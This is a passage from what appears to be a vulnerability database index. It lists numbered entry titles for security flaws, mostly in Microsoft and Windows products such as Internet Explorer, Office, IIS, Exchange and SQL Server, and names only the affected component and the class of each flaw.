Condition Code Execution [35349] Microsoft IE Crafted CSS Tag Handling Memory Corruption [35348] Microsoft IE Urlmon.dll COM Object Instantiation Memory Corruption [35343] Microsoft Visio Document Handling Crafted Packed Object Arbitrary Code Execution [35342] Microsoft Visio Document Handling Crafted Version Number Arbitrary Code Execution [35269] Microsoft ASP .NET Framework Comment Enclosure Handling Request Weakness [34963] Microsoft IE CCRP BrowseDialog Server (ccrpbds6.dll) ActiveX Multiple Property DoS [34959] Microsoft Xbox 360 Hypervisor Syscall Bypass Arbitrary Code Access [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure [34830] Microsoft Outlook Recipient ActiveX (ole32.dll) Crafted HTML DoS [34489] Microsoft Office 2003 Malformed WMF File Handling DoS [34488] Microsoft Excel 2003 XLS Handling Corrupt Format DoS [34407] Adobe Acrobat Reader Plugin for Microsoft IE Microsoft.XMLHTTP ActiveX CLRF Injection [34404] Microsoft IE Media Service Component Arbitrary File Rewrite [34403] Microsoft IE HTML CMarkup Objects Unspecified Memory Corruption [34402] Microsoft IE HTML Objects Unspecified Memory Corruption [34401] Microsoft IE Property Method Handling Memory Corruption [34400] Microsoft IE Uninitialized Object Memory Corruption [34399] Microsoft IE COM Object Instantiation Memory Corruption (931768) [34397] Microsoft CAPICOM CAPICOM.Certificates ActiveX (CAPICOM.dll) Remote Code Execution [34396] Microsoft Office Crafted Drawing Object Arbitrary Code Execution [34395] Microsoft Excel Filter Record Handling Remote Code Execution [34394] Microsoft Office Excel Set Font Handling Remote Code Execution [34393] Microsoft Excel BIFF Record Named Graph Record Parsing Overflow [34392] Microsoft Exchange Server IMAP Literal Processing DoS [34391] Microsoft Exchange Server MIME Decoding Remote Code Execution [34390] Microsoft Exchange Server MODPROPS Malformed iCal DoS [34389] Microsoft Exchange Outlook Web Access (OWA) Attachment Script Injection [34388] Microsoft Word RTF Rich Text Properties Parsing Remote Code Execution [34387] Microsoft Word Data Array Handling Remote Code Execution [34386] Microsoft Word Malformed Drawing Object Arbitrary Code Execution [34385] Microsoft Word Macro Content Arbitrary Code Execution [34082] Plesk for Windows login_up.php3 locale_id Parameter Traversal Arbitrary File Access [34081] Plesk for Windows login.php3 locale_id Parameter Traversal Arbitrary File Access [34077] Microsoft IE navcancl.htm res: URI XSS [34007] Microsoft Content Management Server (CMS) Unspecified XSS [34006] Microsoft Content Management Server (CMS) Crafted HTTP Request Memory Corruption [33639] Microsoft Class Package Export Tool (clspack.exe) Long String Overflow [33638] Microsoft ISA Server IPv6 Filter Rule Bypass [33629] Microsoft IE Animated Cursor (.ani) Handling Arbitrary Command Execution [33627] Microsoft Vista Speech Recognition Web Page Arbitrary Command Execution [33626] Microsoft Visual C++ MSVCR80.DLL Time Functions Assertion Error [33457] Microsoft IIS Crafted TCP Connection Range Header DoS [33398] Windows XP msgina.dll Local Overflow [33271] Microsoft Word Crafted Frame CSRF [33270] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution [33196] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution (934232) [32697] Flip4Mac Windows Media Components WMV Parsing Memory Corruption [32630] Microsoft IE Key Press Event Focus Redirection [32627] Microsoft IE msxml3 Module Nested Tag Race Condition DoS [32626] Microsoft IE Crafted res:// Forced 404 Page Reporting [32625] Microsoft IE res://ieframe.dll/invalidcert.htm Site Security Certificate Discrediting [32624] Microsoft IE mhtml Overflow DoS [32119] Microsoft IE Cross Domain Charset Inheritance Weakness [32087] Microsoft IE onunload Event Address Bar Spoofing [31901] Microsoft Office Unspecified String Handling Arbitrary Code Execution [31900] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution (929434) [31899] Microsoft Help Workshop HPJ File OPTIONS Section Overflow [31898] Microsoft Help Workshop Crafted .cnt File Handling Overflow [31896] Microsoft Project Server pdsrequest.asp GetInitializationData Request SQL Database Password Disclosure [31895] Microsoft IE Blnmgrps.dll COM Object Instantiation Memory Corruption [31894] Microsoft IE Htmlmm.ocx COM Object Instantiation Memory Corruption [31893] Microsoft IE Msb1fren.dll COM Object Instantiation Memory Corruption [31892] Microsoft IE FTP Server Response Parsing Memory Corruption [31891] Microsoft IE Imjpcksid.dll COM Object Instantiation Memory Corruption [31888] Microsoft Malware Protection Engine PDF File Parsing Remote Code Execution [31887] Microsoft MFC Component RTF OLE Object Memory Corruption Remote Code Execution [31886] Microsoft RichEdit OLE Dialog RTF Memory Corruption Remote Code Execution [31883] Microsoft Step-by-Step Interactive Training Bookmark Handling Remote Code Execution [31882] Microsoft MDAC ADODB.Connection ActiveX Control Execute Method Remote Code Execution [31805] XEROX WorkCentre Products Web User Interface Microsoft Networking Configuration Command Injection [31799] Windows Firewall ADS Application Alert Failure [31779] Windows Firewall .exe Incorrect Application Block Alerts [31647] Microsoft IE Javascript IsComponentInstalled Overflow [31607] Microsoft Visual Studio 1 TYPELIB MOVEABLE PURE .rc File Name Overflow [31345] Mozilla Multiple Products on Windows CSS Cursor Image Overflow [31333] Microsoft IE Image File Embedded Content XSS [31332] Microsoft IE Scrollbar CSS Property DoS [31331] Microsoft IE mailto: Handler Arbitrary Command-Line Argument Modification [31330] Microsoft IE File:// URI src Tag IFrame DoS [31329] Microsoft IE DNS Pinning Intranet Server Arbitrary Javascript Execution [31328] Microsoft IE UTF-7 Encoded HTTP 404 Error Message XSS [31326] Microsoft IE HTML Table Tag style Attribute DoS [31325] Microsoft IE HTML Frame Tag Invalid src Attribute DoS [31324] Microsoft IE DirectAnimation ActiveX Multiple Unspecified [31323] Microsoft IE DIV Tag and HTML CSS Float Properties Arbitrary Code Execution [31322] Microsoft IE SSL Certificate Chain Validation MiTM Weakness [31321] Microsoft IE Javascript self.location Refresh DoS [31258] Microsoft Excel Palette Record Handling Overflow [31257] Microsoft Excel Column Record Heap Corruption Remote Code Execution [31256] Microsoft Excel Malformed String Handling Remote Code Execution [31255] Microsoft Excel IMDATA Record Handling Remote Code Execution [31254] Microsoft Outlook Advanced Find .oss File Handling Remote Code Execution [31253] Microsoft Outlook E-mail Header Processing Unspecified DoS [31252] Microsoft Outlook VEVENT Record Handling Remote Code Execution [31251] Microsoft Office 2003 Brazilian Portuguese Grammar Checker Arbitrary Code Execution [31250] Microsoft IE Vector Markup Language (VML) Remote Overflow [31249] Microsoft Excel Malformed Record Memory Access Code Execution [31243] Windows NT FTP Server (WFTP) Pro Server APPE Command Overflow [30834] Microsoft IE URLMON.DLL Long URL HTTP Redirect Overflow [30826] Microsoft Visual Basic Click Event Procedure Overflow [30825] Microsoft Word Malformed Data Structure Handling Memory Corruption [30824] Microsoft Word Malformed String Memory Corruption [30822] Microsoft IE A Tag Long Title Attribute DoS [30820] Microsoft Word mso.dll / mso9.dll LsCreateLine Function DoS [30816] Microsoft IE TIF Folder Cached Content Information Disclosure [30815] Microsoft IE TIF Folder Drag and Drop Operation Information Disclosure [30814] Microsoft IE DHTML Script Function Memory Corruption [30813] Microsoft IE Script Error Handling Memory Corruption [30402] Microsoft w3wp Crafted COM Component Request DoS [30208] Microsoft XMLHTTP ActiveX Control setRequestHeader Method Arbitrary Code Execution [30155] Microsoft Visual Studio WMI Object Broker ActiveX (WmiScriptUtils.dll) Unspecified Code Execution [30087] Microsoft IE Empty APPLET Tag DoS [30022] Microsoft IE Non-breaking Spaces Popup Address Bar Spoofing [29724] Microsoft Hyperlink Object Library (hlink.dll) Crafted Hyperlink Arbitrary Code Execution [29720] Microsoft PowerPoint Unspecified Code Execution [29525] Microsoft IE dxtmsft3.dll Multiple ActiveX COM Object DoS [29524] Microsoft IE dxtmsft.dll Multiple ActiveX COM Object DoS [29514] AK-Systems Windows Terminal VNC Server Default Null Password [29512] Windows NT FTP Server (WFTP) Multiple Command Remote Overflow [29501] Microsoft Visual Studio Multiple ActiveX COM Object Remote Memory Corruption [29448] Microsoft PowerPoint Crafted File Unspecified Code Execution [29447] Microsoft PowerPoint Crafted PPT Data Record Code Execution [29446] Microsoft PowerPoint Crafted PPT Object Pointer Code Execution [29445] Microsoft Excel Crafted XLS COLINFO Record Arbitrary Code Execution [29444] Microsoft Excel Crafted Lotus 1-2-3 File Arbitrary Code Execution [29443] Microsoft Excel Crafted XLS DATETIME Record Arbitrary Code Execution [29442] Microsoft Word for Mac Crafted String Unspecified Code Execution [29441] Microsoft Word Crafted Mail Merge File Arbitrary Code Execution [29440] Microsoft Word memmove Integer Overflow [29431] Microsoft .NET Framework AutoPostBack Property Unspecified XSS [29430] Microsoft Office Malformed Smart Tag Arbitrary Code Execution [29429] Microsoft Office mso.dll Malformed Record Handling Arbitrary Code Execution [29428] Microsoft Office Malformed Chart Record Unspecified Arbitrary Code Execution [29427] Microsoft Office Crafted String Unspecified Arbitrary Code Execution [29426] Microsoft XML Core Services XSLT Processing Overflow [29425] Microsoft XML Core Services XMLHTTP ActiveX Control Server-side Redirect Information Disclosure [29412] Microsoft Terminal Server Explorer Error Arbitrary Code Execution [29347] Microsoft IE msoe.dll COM Object Instantiation Code Execution [29346] Microsoft IE chtskdic.dll COM Object Instantiation Code Execution [29345] Microsoft IE imskdic.dll COM Object Instantiation Code Execution [29259] Microsoft PowerPoint PPT Unspecified Arbitrary Code Execution [29143] Microsoft PowerPoint PPT Malformed BIFF File Arbitrary Command Execution [29129] Microsoft IE wininet.dll Content-Type DoS [28946] Microsoft IE Vector Markup Language (VML) Arbitrary Code Execution [28842] Microsoft IE daxctle.ocx KeyFrame() Method Overflow [28841] Microsoft IE daxctle.ocx Spline Function Call Overflow [28730] Microsoft Publisher PUB File Font Parsing Overflow [28726] Microsoft Works Malformed Lotus 1-2-3 Spreadsheet DoS [28725] Microsoft Works Malformed Excel Spreadsheet DoS [28724] Microsoft Works Malformed Excel Spreadsheet Overflow [28723] Microsoft Works Malformed Works Spreadsheet DoS [28627] Microsoft IE VBScript and Javascript Infinite Loop Stack Overflow [28614] Microsoft IE input/div Tag width Conflict DoS [28539] Microsoft Word 2000 Unspecified Code Execution [28538] Microsoft Excel Cell Comment Rebuild Arbitrary Code Execution [28537] Microsoft Excel Crafted SELECTION Record Arbitrary Code Execution [28536] Microsoft Excel SELECTION Record Memory Corruption Arbitrary Code Execution [28535] Microsoft Excel Crafted COLINFO Record Arbitrary Code Execution [28534] Microsoft Excel Crafted LABEL Record Arbitrary Code Execution [28533] Microsoft Excel Crafted FNGROUPCOUNT Value Arbitrary Code Execution [28532] Microsoft Excel Crafted BIFF Record Array Index Arbitrary Code Execution [28381] Microsoft IE ActiveX SaveFile Handling DoS [28376] Microsoft IE US-ASCII Character Set Filter Bypass XSS [28260] Microsoft IIS FrontPage Server Extensions (FPSE) shtml.exe Path Disclosure [28134] Windows NT FTP Server (WFTP) Server SIZE Command Remote Overflow [28132] Microsoft IE HTTP 1.1 URL Parsing Overflow [27922] Microsoft Virtual DOS Machine (VDM) Local Memory Disclosure [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure [27855] Microsoft IE document.getElementByID Crafted CSS Arbitrary Code Execution [27854] Microsoft IE Chained CSS Imports Memory Corruption [27853] Microsoft IE HTML Rendering Memory Corruption [27852] Microsoft IE Uninitialized COM Object Memory Corruption [27851] Microsoft IE Redirect Handling Cross-Domain Privilege Escalation [27850] Microsoft IE Cross Site Window Location Information Disclosure [27849] Microsoft Visual Basic Unspecified Document Handling Overflow [27842] Microsoft Management Console (MMC) HTML-embedded Resource XSS Arbitrary Command Execution [27685] IBM Informix Dynamic Server on Windows username Overflow [27533] Microsoft IE Orphan Object Property Access NULL Dereference [27532] Microsoft IE ADODB.Recordset SysFreeString Invalid Length [27530] Microsoft IE NDFXArtEffects Multiple Property Overflow [27507] Microsoft Excel Embedded Shockwave Flash Object Arbitrary Javascript Execution [27475] Microsoft IE Nested Objects Exception Handler Unspecified Memory Corruption [27373] Microsoft IE Native Function Iteration NULL Dereference [27372] Microsoft IE Forms Multiple Object ListWidth Property Overflow [27327] Microsoft PowerPoint PPT File Closure Memory Corruption [27326] Microsoft PowerPoint powerpnt.exe Unspecified Issue [27325] Microsoft PowerPoint mso.dll PPT Processing Unspecified Code Execution [27324] Microsoft PowerPoint mso.dll PPT Processing Arbitrary Code Execution [27232] Microsoft IE NMSA.ASFSourceMediaDescription dispValue Overflow [27231] Microsoft IE HTML Help COM Object Click Method NULL Dereference [27230] Microsoft IE CEnroll SysAllocStringLen Invalid Length [27153] Microsoft .NET Framework Crafted Request Access Restriction Bypass [27150] Microsoft Office MSO.DLL String Processing Overflow [27149] Microsoft Office Malformed Property Overflow Arbitrary Code Execution [27148] Microsoft Office File Processing Malformed String Arbitrary Code Execution [27147] Microsoft Office PNG Processing Unspecified Code Execution [27146] Microsoft Office GIFIMP32.FLT GIF Parsing Overflow [27112] Microsoft IE OVCtl NewDefaultItem Method NULL Dereference [27111] Microsoft IE OWC11.DataSourceControl getDataMemberName Method Overflow [27110] Microsoft IE WebViewFolderIcon setSlice Overflow [27109] Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Overflow [27108] Microsoft IE MHTMLFile Multiple Property NULL Dereference [27087] Microsoft IIS SMTP Encapsulated SMTP Address Open Relay [27059] Microsoft IE FolderItem Object NULL Dereference [27057] Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference [27056] Microsoft IE TriEditDocument URL Property NULL Dereference [27055] Microsoft IE HtmlDlgSafeHelper fonts Property NULL Dereference [27053] Microsoft Excel Asian Language Style Option Overflow [27014] Microsoft IE Object.Microsoft.DXTFilter Enabled Property NULL Dereference [27013] Microsoft IE DirectAnimation.DAUserData Data Property NULL Dereference [26957] Microsoft IE File Share Traversal Arbitrary HTA Execution [26956] Microsoft IE object.documentElement.outerHTML Cross-site Information Disclosure [26955] Microsoft IE RDS.DataControl SysAllocStringLen Invalid Length Issue [26921] Novell GroupWise Windows Client Arbitrary Email Access [26839] Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference [26837] Microsoft IE Frameset inside Table NULL Dereference [26836] Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference [26835] Microsoft IE HTML Help COM Object Image Property Heap Overflow [26834] Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference [26771] Webmin on Windows Crafted Backslash Request Traversal Arbitrary File Access [26686] Toshiba Bluetooth Stack for Windows TOSRFBD.SYS Remote Overflow DoS [26666] Microsoft Hyperlink Object Library hlink.dll Link Processing Overflow [26536] Adobe Reader for Windows Multiple Unspecified Issues [26527] Microsoft Excel Malformed URL String Handling Overflow [26446] Microsoft IE Multipart HTML File Save Memory Corruption [26445] Microsoft IE Modal Browser Window Address Bar Spoofing [26444] Microsoft IE DXImageTransform.Microsoft.Light ActiveX Arbitrary Code Execution [26443] Microsoft IE UTF-8 Encoded HTML Overflow [26442] Microsoft IE Wmm2fxa.dll DXImageTransform COM Object Memory Corruption [26441] Microsoft Exchange Server Outlook Web Access HTML Parsing Unspecified XSS [26435] Microsoft PowerPoint Malformed Record Arbitrary Code Execution [26434] Microsoft JScript Object Release Memory Corruption [26193] Microsoft NetMeeting Unspecified Remote DoS [26175] Microsoft Jet SQL Command Overflow NULL Dereference DoS [25635] Microsoft Word Unspecified Code Execution [25429] Novell Client for Windows DPRPC library (DPRPCW32.DLL) ndps_xdr_array Function Remote Overflow [25400] IBM WebSphere Application Server (WAS) on Windows Registry Cleartext Credential Disclosure [25338] Microsoft Exchange Collaboration Data Objects Crafted Email Code Execution [25073] Microsoft IE mhtml: Redirection Domain Restriction Bypass [25003] Microsoft Office mailto: Arbitrary File Access [24966] Microsoft IE object Tag Memory Corruption Arbitrary Code Execution [24918] Ethereal NetXray/Windows Sniffer File Code Overflow [24595] Microsoft Office Malformed BIFF Record Multiple File Format Processing DoS [24547] Microsoft IE HTML Parsing Unspecified Remote Code Execution [24546] Microsoft IE COM Object Instantiation Remote Code Execution [24545] Microsoft IE HTML Element Crafted Tag Arbitrary Code Execution [24544] Microsoft IE IOleClientSite Dynamic Object Script Execution [24543] Microsoft IE Navigation Method Cross-Domain Information Disclosure [24542] Microsoft IE Unspecified Address Bar Spoofing [24541] Microsoft IE Double Byte Character Set (DBCS) Parsing Overflow [24518] Microsoft FrontPage Server Extensions fpadmdll.dll Multiple Parameter XSS [24517] Microsoft Data Access Components RDS.Dataspace ActiveX Remote Code Execution [24490] Microsoft IE w/ Sun Java VM INPUT Focus DoS [24465] Microsoft IE Window Loading Race Condition Address Bar Spoofing [24318] Microsoft Fingerprint Reader Cleartext Credential Transmission [24208] Microsoft .NET Framework ILDASM Overflow [24207] Microsoft .NET Framework ILASM .il File Processing Overflow [24121] Microsoft Commerce Server 2002 authfiles/login.asp Authentication Bypass [24095] Microsoft IE Arbitrary HTA File Execution [24081] Microsoft Outlook 2003 Unspecified Malformed Word Attachment DoS [24050] Microsoft IE createTextRange() Function Arbitrary Code Execution [23964] Microsoft IE mshtml.dll Multiple Script Action Handler Overflow [23903] Microsoft Office Crafted Routing Slip Arbitrary Code Execution [23902] Microsoft Office Excel Malformed Record Arbitrary Code Execution [23901] Microsoft Office Excel Malformed Graphic Arbitrary Code Execution [23900] Microsoft Office Excel Malformed Description Arbitrary Code Execution [23899] Microsoft Office Excel BIFF File Processing Malformed BOOLERR Record Arbitrary Code Execution [23711] Microsoft Visual Studio .dbp File DataProject Field Buffer Overflow [23657] Microsoft IE ActiveX Killbit Setting Bypass [23609] Microsoft IE Crafted Elements Status Bar URL Spoofing [23608] Microsoft IE Iframe Folder Delete Weakness [23591] Microsoft Office Spreadsheet Component SaveAs Capability Arbitrary File Creation [23590] Microsoft IIS Traversal Arbitrary FPSE File Access [23588] Microsoft IE Self-referenced OBJECT Directive DoS [23572] M4 Project enigma-suite Windows Client Default Account [23569] HP System Management Homepage (SMH) on Windows Unspecified Traversal Arbitrary File Access [23542] lighttpd on Windows Crafted Filename Request Script Source Disclosure [23490] Microsoft IE Scripting Engine Thread Stack Exhaustion DoS [23484] Microsoft SQLServer 2000 sp_addalias Procedure Privileged Alias Creation [23307] Microsoft IE window.status Memory Leak DoS [23234] Microsoft SQLServer 2000 Unspecified Invalid Client Buffer DoS [23231] Microsoft SQL Server 2000 SQL Profiler Multiple Method DoS [23228] Microsoft Outlook Web Access .INC File Direct Request Source Disclosure [23205] Microsoft SQLServer 2000 Crafted Sort Command User Mode Scheduler (UMS) Bypass DoS [23203] Microsoft SQL Server 2000 Database Name Transact-SQL Statement Privilege Escalation [23202] Microsoft SQLServer 2000 sysmembers Virtual Table Query Overflow [23201] Microsoft SQL Server 2000 Dynamic Transact-SQL Statement Disclosure [23200] Microsoft SQLServer 2000 Encrypted Stored Procedure Dynamic Query Disclosure [23135] Microsoft PowerPoint Temporary Internet Files Information Disclosure [22977] Microsoft IE jscript.dll document.write() NULL Pointer DoS [22976] Microsoft IE Crafted WMF Header Size Arbitrary Code Execution [22948] Microsoft IE urlmon.dll BGSOUND Tag file Attribute Overflow DoS [22941] Microsoft HTML Help Workshop .hhp Parsing Overflow [22834] Microsoft Log Sink Class pkmcore.dll ActiveX Arbitrary File Manipulation [22824] Microsoft Excel xls Processing Malformed Page Size Name Null Dereference [22823] Microsoft Excel xls Processing Malformed Graphic Pointer NULL Pointer Dereference [22649] ELOG on Windows Entry Resubmission Overflow [22364] WinRAR for Windows Archive Filename Overflow [22356] Microsoft IE Unspecified NULL Dereference DoS (#2) [22355] Microsoft IE Unspecified NULL Dereference DoS (#1) [22354] Microsoft IE Malformed table datasrc Tag DoS [22351] Microsoft IE Modal Security Dialog Race Condition [22332] Microsoft Visual Studio UserControl Load Event Code Execution [22305] Microsoft Outlook/Exchange TNEF Decoding Arbitrary Code Execution [21907] Microsoft Office InfoPath 2003 Mshtml.dll Form Handling DoS [21805] Microsoft IIS Crafted URL Remote DoS [21763] Microsoft IE Embedded CLSID COM Object Arbitrary Code Execution [21762] Microsoft IE HTTPS Proxy Basic Authentication URL Cleartext Transmission [21761] Microsoft IE Keyboard Shortcut Processing Weakness [21760] Microsoft IE Suppressed Download Dialog Window Manipulation Weakness [21568] Microsoft Excel xls Processing msvcrt.memmove() Function Malformed Range Overflow [21562] Microsoft IE CSS Crafted p Element DoS [21537] Microsoft IIS Log File Permission Weakness Remote Modification [21532] Microsoft IE CSS @import Directive Cross Domain Information Disclosure [20886] Microsoft IE Unspecified Margin/Padding NULL Pointer Dereference DoS [20874] Microsoft IE clipboardData Object getData Method Content Disclosure [20500] Microsoft IE Restricted Zone Site Addition URI DoS [20464] GO-Global for Windows _USERSA_ Remote Overflow [20376] Microsoft IE with JRE mshtmled.dll Malformed frameset Tag DoS [20308] Skype for Windows Crafted VCARD Handling Overflow [20307] Skype for Windows Crafted callto/skype URL Overflow [20271] Microsoft IE settimeout Function Recursion DoS [20248] Microsoft IE Embedded Content Processing XSS [20241] Microsoft ISA Server Fragmented UDP Saturation DoS [20207] Microsoft IE Alphanumeric Password Character Recognition Issue [20199] Microsoft IE Image Saturation Handling DoS [20146] Microsoft IE PerfectNav Plugin Malformed URL DoS [20106] BEA WebLogic on Windows Registry Cleartext Password Disclosure [19905] Microsoft Collaboration Data Objects Remote Overflow [19876] Microsoft AntiSpyware Registry Extension Bypass [19806] Microsoft IE Crafted Double Backslash shell: URI DoS [19798] Microsoft IE for Mac Malformed BGSOUND Tag DoS [19796] Microsoft IE Malformed IFRAME File Source DoS [19662] Microsoft IE XMLHTTP HTTP Request Injection [19267] WRQ Reflection for Secure IT Windows Server Mixed Case Ruleset Bypass [19266] WRQ Reflection for Secure IT Windows Server Default Account Persistence [19265] WRQ Reflection for Secure IT Windows Server Host Private Key File Permission Weakness [19264] Microsoft Exchange Server 2003 Crafted IMAP4 Folder Listing Request DoS [19209] Rediff Bol Fetch.FetchContact.1 ActiveX Windows Address Book Disclosure [19093] Microsoft Design Tools msdds.dll COM Object Arbitrary Code Execution [19089] Microsoft IE Unspecified Remote Code Execution [19029] Microsoft IE Meta Refresh Parsing Weakness [19024] Microsoft IE Automatic MIME Detection Weakness [18926] Microsoft IIS SERVER_NAME Variable Spoofing Filter Bypass [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation [18822] Microsoft DirectX DirectShow QUARTZ.DLL AVI Processing Overflow [18703] Novell eDirectory iMonitor on Windows dhost.exe Unspecified Remote Overflow [18612] Microsoft IE Multiple COM Object Embedded CLSID Arbitrary Remote Code Execution [18611] Microsoft IE Web Folder Cross-Domain Code Execution [18610] Microsoft IE JPEG Rendering Memory Corruption Arbitrary Code Execution [18587] Gaim for Windows accounts.xml Cleartext Password Local Disclosure [18510] Microsoft IE AJAX Crafted Content-type Header DoS [18501] CA BrightStor ARCserve Backup Agent for Windows Long String Overflow [18484] Mozilla Firefox with Microsoft Office Shared Section Permission Weakness Information Disclosure [18461] Microsoft ActiveSync Client/Server Partnership ID Spoofing [18460] Microsoft ActiveSync Authentication Transmission Cleartext Disclosure [18459] Microsoft ActiveSync Sync Request Saturation DoS [18458] Microsoft ActiveSync Device Response Equipment ID Enumeration [18243] Microsoft Outlook MS-DOS Device Name Attachment DoS [18241] Microsoft Outlook Express begin Keyword Message Handling DoS [18173] MySQL on Windows USE Command MS-DOS Device Name DoS [18152] Microsoft IE Image File Handling Remote DoS [17944] Windows XP OEM Backdoor Administrator Account [17893] Microsoft ASP.NET RPC/encoded Mode Malformed SOAP Message DoS [17829] Microsoft Office .doc Font Parsing Overflow [17707] Microsoft Front Page Malformed HTML Edit DoS [17680] Microsoft IE JVIEW javaprxy.dll Memory Manipulation Arbitrary Code Execution [17671] Microsoft Site Server viewcode.asp Information Disclosure [17670] Microsoft Site Server Multiple Sample Sites SQL Injection [17669] Microsoft Site Server cphost.dll Arbitrary Code Execution [17668] Microsoft Site Server cphost.dll Malformed File Upload Disk Consumption DoS [17667] Microsoft Site Server LDAP_Anonymous Account Cleartext Password Disclosure [17666] Microsoft Site Server formslogin.asp url Parameter XSS [17665] Microsoft Site Server Default.asp XSS [17664] Microsoft Site Server remind.asp Information Disclosure [17663] Microsoft Site Server auoconfig.asp Information Disclosure [17662] Microsoft Site Server VsPrAuoEd.asp Information Disclosure [17661] Microsoft Site Server VsLsLpRd.asp Information Disclosure [17660] Microsoft Site Server VsTmPr.asp Information Disclosure [17659] Microsoft Site Server vs.asp Information Disclosure [17658] Microsoft Site Server default.asp Information Disclosure [17657] Microsoft Site Server UserManager.asp Arbitrary LDAP Modification [17656] Microsoft Site Server GroupManager.asp Arbitrary LDAP Modification [17655] Microsoft Site Server DSN.asp Information Disclosure [17654] Microsoft Site Server driver.asp Information Disclosure [17653] Microsoft Site Server domain.asp Information Disclosure [17652] Microsoft Site Server findserver.asp Information Disclosure [17624] VERITAS Backup Exec Remote Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow [17622] VERITAS Backup Exec for Windows Admin Plus Pack Option Remote Overflow [17389] Microsoft Outlook Crafted E-mail Subject Arbitrary System File Creation [17342] Microsoft ISA Server Basic Credentials Exposure [17334] Microsoft IE Script Code Obfuscation (Ghost) [17314] Microsoft IE XML Redirect Information Disclosure [17313] Microsoft IE PNG Image Processing Arbitrary Code Execution [17312] Microsoft ISA Server NetBIOS Predefined Filter Privilege Escalation [17311] Microsoft ISA Server Cache Poisoning Restriction Bypass [17310] Microsoft Agent Trusted Internet Content Spoofing (fireclicking) [17307] Microsoft Exchange Outlook Web Access HTML Email XSS [17306] Microsoft Outlook Express NNTP LIST Command Remote Overflow [17218] Microsoft IE Stack Overflow Saturation DoS [17217] Microsoft IE Embedded File Recursion DoS [17176] Microsoft IE msxml3.dll Malformed Ref href Link DoS [17159] Microsoft IE Malformed FTP URL DoS [17158] Microsoft IE Crafted BMP Size Setting DoS [17124] Microsoft IIS Malformed WebDAV Request DoS [17123] Microsoft IIS Multiple Unspecified Admin Pages XSS [17122] Microsoft IIS Permission Weakness .COM File Upload [17094] Microsoft IE window() Function Arbitrary Code Execution [17088] Microsoft AntiSpyware gsasDtServ.exe Path Subversion Privilege Escalation [17045] SunOS Openwindows psh xnews Privilege Escalation [17031] Microsoft ISA Server 2000 SecureNAT Traffic Saturation DoS [16895] IRIX ftpd Unspecified Windows Link DoS [16827] Microsoft WGA Multiple Method Validation Bypass [16814] Microsoft Word mcw File Processing Overflow [16813] Microsoft ASP.NET FileStream Method Nonexistent File Request Path Disclosure [16729] avast! Anti-Virus on Windows NT Unspecified Scanner Bypass [16342] Microsoft IE Cross Site Mouse Click Disclosure [16196] Microsoft ASP.NET __VIEWSTATE Functionality Replay Attack [16195] Microsoft ASP.NET __VIEWSTATE Functionality Nested Request DoS [16024] AbsoluteTelnet Windows Title Remote Overflow [15979] OpenWindows Mailtool Malformed Mail Attachment DoS [15879] APG Classmaster Workstation Windows SMB Share Access Restriction Bypass [15757] Microsoft SQL Server sa Account Default Null Password [15749] Microsoft IIS / Site Server code.asp Arbitrary File Access [15480] Microsoft Outlook From Header Comma Parsing Failure [15479] Microsoft XP SP1 explorer.exe Malformed GIF Processing DoS [15470] Microsoft Word Unspecified Overflow [15467] Microsoft Exchange Server SMTP Extended Verb X-LINK2STATE Remote Overflow [15466] Microsoft IE Content Advisor Overflow [15465] Microsoft IE DHTML Object Memory Corruption Code Execution [15464] Microsoft IE wininet.dll Long Hostname Heap Corruption Code Execution [15342] Microsoft IIS Persistent FTP Banner Information Disclosure [15329] Microsoft IE Malformed RSA Public Key SSL Detection Failure [15224] Microsoft IE External Caching Security Failure Arbitrary File Access [15223] Microsoft IE XHTML Formatted Comment User Confirmation Bypass [15222] Microsoft IE imagetoolbar Functionality Disable Pop Up Dereference DoS [15221] Microsoft IE Drag and Drop Zone Security Preference Bypass [15220] Microsoft IE showHelp() Function Cross Domain Code Execution [15219] Microsoft IE XML Object Arbitrary File Access [15218] Microsoft IE showHelp() Function Double Backslash Arbitrary .chm Execution [15217] Microsoft IE input Tag Rendering DoS [15216] Microsoft IE Dialog Box Cross Domain Arbitrary Program Execution [15187] Microsoft Jet Database msjet40.dll File Parsing Overflow [15110] Microsoft Outlook Connector for Lotus Domino Password Policy Bypass [14882] Microsoft Office InfoPath Manifest.xsf Information Disclosure [14801] Eudora 'Use Microsoft Viewer' Option IE Launch Arbitrary Code Execution [14793] Microsoft IE window.showHelp() HTML Help File Arbitrary Command Execution [14765] Windows NT FTP Server (WFTP) Pro Server MKD/XMKD Absolute Path DoS [14764] Windows NT FTP Server (WFTP) Pro Server Unterminated Long Command DoS [14763] Windows NT FTP Server (WFTP) Pro Server Multiple Command Local Overflow [14762] Windows NT FTP Server (WFTP) STAT Command File Transfer Path Disclosure [14761] Windows NT FTP Server (WFTP) REST Command Malformed File Write Handling Remote DoS [14663] Microsoft AntiSpyware cscript/wscript Filter Bypass [14617] Microsoft Exchange Server 2003 Folder Handling DoS [14509] Microsoft Services for Unix Malformed RPC Client Fragment Packet DoS [14502] Microsoft Data Access Components RDS Data Stub Remote Overflow [14497] Microsoft Services for Unix RPC Library Malformed Packet Fragment DoS [14478] Worldspan for Windows Gateway Res Manager Port 17990 Malformed Request DoS [14446] Microsoft Virtual Machine Java Applet Invalid Handle DoS [14445] Microsoft Virtual Machine XML Support Classes Inappropriate Methods [14430] Microsoft Commerce Server 2000 Profile Service Affected API Overflow [14396] Microsoft ISA DNS Intrusion Detection Filter DoS [14269] Windows NT FTP Server (WFTP) .lnk Traversal Arbitrary File Access [14229] Microsoft IIS asp.dll Scripting.FileSystemObject Malformed Program DoS [14150] Windows NT Inappropriate Registry Key Permissions [14149] Windows NT Inappropriate Registry Key Value [14068] Smarty Windows Installation File Permission Issue [14025] Microsoft IE Script Initiated Popup Title Bar Spoofing [13985] Microsoft IIS Malformed HTTP Request Log Entry Spoofing [13945] Windows NT FTP Server (WFTP) Floppy Drive CD Request DoS [13928] Microsoft ASP.NET HttpServerUtility.HtmlEncode Unicode Character 